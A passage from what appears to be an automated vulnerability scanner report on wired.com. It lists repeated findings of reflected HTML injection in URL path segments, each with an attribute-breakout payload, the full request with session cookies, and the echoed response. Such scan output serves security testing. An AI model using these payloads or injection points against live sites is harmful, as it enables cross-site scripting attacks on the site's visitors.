Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:25 GMT
Date: Sun, 21 Nov 2010 23:13:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news3a30c"><a>b820a999ffb">
...[SNIP]...

1.199. http://www.wired.com/science/discoveries/news/2006/04/70701 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2006/04/70701

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2189"><a>e200d456324 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceb2189"><a>e200d456324/discoveries/news/2006/04/70701 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:58 GMT
Date: Sun, 21 Nov 2010 23:12:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceb2189"><a>e200d456324 ss_discoveries c_news">
...[SNIP]...

1.200. http://www.wired.com/science/discoveries/news/2006/04/70701 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2006/04/70701

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fddd"><a>532487198c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries3fddd"><a>532487198c1/news/2006/04/70701 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:18 GMT
Date: Sun, 21 Nov 2010 23:13:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries3fddd"><a>532487198c1 c_news">
...[SNIP]...

1.201. http://www.wired.com/science/discoveries/news/2006/04/70701 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2006/04/70701

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ba0f"><a>521893294d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news6ba0f"><a>521893294d7/2006/04/70701 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:31 GMT
Date: Sun, 21 Nov 2010 23:13:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news6ba0f"><a>521893294d7">
...[SNIP]...

1.202. http://www.wired.com/science/discoveries/news/2007/02/72573 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/02/72573

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e52a"><a>266a89d6056 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science6e52a"><a>266a89d6056/discoveries/news/2007/02/72573 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:10 GMT
Date: Sun, 21 Nov 2010 23:10:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science6e52a"><a>266a89d6056 ss_discoveries c_news">
...[SNIP]...

1.203. http://www.wired.com/science/discoveries/news/2007/02/72573 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/02/72573

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33c3b"><a>4f568f221b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries33c3b"><a>4f568f221b1/news/2007/02/72573 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:36 GMT
Date: Sun, 21 Nov 2010 23:10:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries33c3b"><a>4f568f221b1 c_news">
...[SNIP]...

1.204. http://www.wired.com/science/discoveries/news/2007/02/72573 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/02/72573

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ce8"><a>7d46a6a8f6b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newsb4ce8"><a>7d46a6a8f6b/2007/02/72573 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:47 GMT
Date: Sun, 21 Nov 2010 23:10:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newsb4ce8"><a>7d46a6a8f6b">
...[SNIP]...

1.205. http://www.wired.com/science/discoveries/news/2007/02/72649 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/02/72649

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2186"><a>2b24d914e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencef2186"><a>2b24d914e5/discoveries/news/2007/02/72649 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29310
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:09 GMT
Date: Sun, 21 Nov 2010 23:10:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencef2186"><a>2b24d914e5 ss_discoveries c_news">
...[SNIP]...

1.206. http://www.wired.com/science/discoveries/news/2007/02/72649 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/02/72649

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7be0f"><a>71f4beaefd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries7be0f"><a>71f4beaefd6/news/2007/02/72649 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:36 GMT
Date: Sun, 21 Nov 2010 23:10:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries7be0f"><a>71f4beaefd6 c_news">
...[SNIP]...

1.207. http://www.wired.com/science/discoveries/news/2007/02/72649 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/02/72649

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 423ae"><a>3fe3a67e3bd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news423ae"><a>3fe3a67e3bd/2007/02/72649 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:47 GMT
Date: Sun, 21 Nov 2010 23:10:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news423ae"><a>3fe3a67e3bd">
...[SNIP]...

1.208. http://www.wired.com/science/discoveries/news/2007/03/72723 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/03/72723

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9720"><a>e9f4d710ca3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceb9720"><a>e9f4d710ca3/discoveries/news/2007/03/72723 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:57 GMT
Date: Sun, 21 Nov 2010 23:10:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceb9720"><a>e9f4d710ca3 ss_discoveries c_news">
...[SNIP]...

1.209. http://www.wired.com/science/discoveries/news/2007/03/72723 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/03/72723

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee3a7"><a>2240bc5bf26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesee3a7"><a>2240bc5bf26/news/2007/03/72723 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:17 GMT
Date: Sun, 21 Nov 2010 23:11:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesee3a7"><a>2240bc5bf26 c_news">
...[SNIP]...

1.210. http://www.wired.com/science/discoveries/news/2007/03/72723 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/03/72723

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e7bf"><a>a0ed15676db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news6e7bf"><a>a0ed15676db/2007/03/72723 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:29 GMT
Date: Sun, 21 Nov 2010 23:11:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news6e7bf"><a>a0ed15676db">
...[SNIP]...

1.211. http://www.wired.com/science/discoveries/news/2007/03/72805 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/03/72805

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe9ae"><a>f527668027f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencefe9ae"><a>f527668027f/discoveries/news/2007/03/72805 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:56 GMT
Date: Sun, 21 Nov 2010 23:10:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencefe9ae"><a>f527668027f ss_discoveries c_news">
...[SNIP]...

1.212. http://www.wired.com/science/discoveries/news/2007/03/72805 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/03/72805

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e162"><a>7810533295 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries7e162"><a>7810533295/news/2007/03/72805 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29310
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:13 GMT
Date: Sun, 21 Nov 2010 23:11:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries7e162"><a>7810533295 c_news">
...[SNIP]...

1.213. http://www.wired.com/science/discoveries/news/2007/03/72805 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/03/72805

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8058d"><a>0c1616ffa46 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news8058d"><a>0c1616ffa46/2007/03/72805 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:23 GMT
Date: Sun, 21 Nov 2010 23:11:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news8058d"><a>0c1616ffa46">
...[SNIP]...

1.214. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0408 [REST URL parameter 1]  previous  next

Summary

Severity:   High
